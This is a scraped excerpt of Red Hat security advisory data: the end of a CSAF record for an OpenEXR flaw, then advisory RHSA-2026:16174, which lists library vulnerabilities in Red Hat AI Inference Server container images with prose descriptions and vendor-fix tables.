"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8870"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.src",
"AppStream-9.0.0.Z.E4S:openexr-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debuginfo-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-debugsource-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-0:3.1.1-2.el9_0.2.x86_64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.aarch64",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.i686",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.ppc64le",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.s390x",
"AppStream-9.0.0.Z.E4S:openexr-libs-debuginfo-0:3.1.1-2.el9_0.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:16174
Vulnerability from csaf_redhat - Published: 2026-05-12 08:21 - Updated: 2026-05-14 22:36A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A segment fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted tiff file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A flaw was found in the http.client module in the Python standard library. When reading an HTTP response from a server, if no read amount is specified, the default behavior will be to use Content-Length. This issue allows a malicious server to cause the client to read large amounts of data into memory, potentially causing memory allocations errors, swapping, out-of-memory conditions or even system freezes.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A flaw was found in the imaplib module in the Python standard library. The imaplib module does not reject control characters, such as newlines, in user-controlled input passed to IMAP commands. This issue allows an attacker to inject additional commands to be executed in the IMAP server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the poplib module in the Python standard library. The poplib module does not reject control characters, such as newlines, in user-controlled input passed to POP3 commands. This issue allows an attacker to inject additional commands to be executed in the POP3 server.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in protobuf. A remote attacker can exploit this denial-of-service (DoS) vulnerability by supplying deeply nested `google.protobuf.Any` messages to the `google.protobuf.json_format.ParseDict()` function. This bypasses the intended recursion depth limit, leading to the exhaustion of Python’s recursion stack and causing a `RecursionError`, which results in a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the email module in the Python standard library. When serializing an email message, the BytesGenerator class fails to properly quote newline characters for email headers. This issue is exploitable when the LiteralHeader class is used as it does not respect email folding rules, allowing an attacker to inject email headers and potentially modify message recipients or the email body, and spoof sender information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Firefox and Thunderbird. The Mozilla Foundation's Security Advisory describes the following issue: Heap buffer overflow in libvpx.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libpng, a reference library for processing PNG (Portable Network Graphics) image files. A local attacker could exploit a heap buffer over-read vulnerability in the `png_image_finish_read` function by tricking a user into processing a specially crafted interlaced 16-bit PNG file with an 8-bit output format and non-minimal row stride. This could lead to a denial of service (DoS) and potentially information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libpng, a reference library for PNG (Portable Network Graphics) raster image files. An integer truncation vulnerability exists in the png_write_image_16bit and png_write_image_8bit simplified write API functions. A local attacker could exploit this flaw by providing a negative row stride (for bottom-up image layouts) or a stride exceeding 65535 bytes, leading to a heap buffer over-read. This can result in information disclosure or a denial of service (DoS) to the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A buffer overflow vulnerability was discovered in the MUNGE authentication daemon (munged). In affected versions, a local attacker can potentially leak secret cryptographic key material from the daemon's memory by sending a specially crafted message with an oversized address field. With the leaked key, an attacker could forge authentication credentials to impersonate any user, potentially escalating privileges in systems that rely on MUNGE for identity verification.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
|
A heap based buffer overflow flaw has been discovered in LibPNG. Prior to version 1.6.55, an out-of-bounds read vulnerability exists in the png_set_quantize() API function. When the function is called with no histogram and the number of colors in the palette is more than twice the maximum supported by the user's display, certain palettes will cause the function to enter into an infinite loop that reads past the end of an internal heap-allocated buffer. The images that trigger this vulnerability are valid per the PNG specification.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:b74a5cc403d0a07b0ef29808cef709121169582b69f2b9ff54a02d35b0cc0908_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:c79e06a3f71b81ddea9e9e4f51f378f4a5985b9f176e3d17953ffa7cd2b69823_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-spyre-rhel9@sha256:e272da91193f53a2a498734a0f83934e6e3cae260a9b78f18ba7954a3e4a1b50_s390x | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the 'helpfile' option. A local user could exploit this by providing a specially crafted 'helpfile' option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
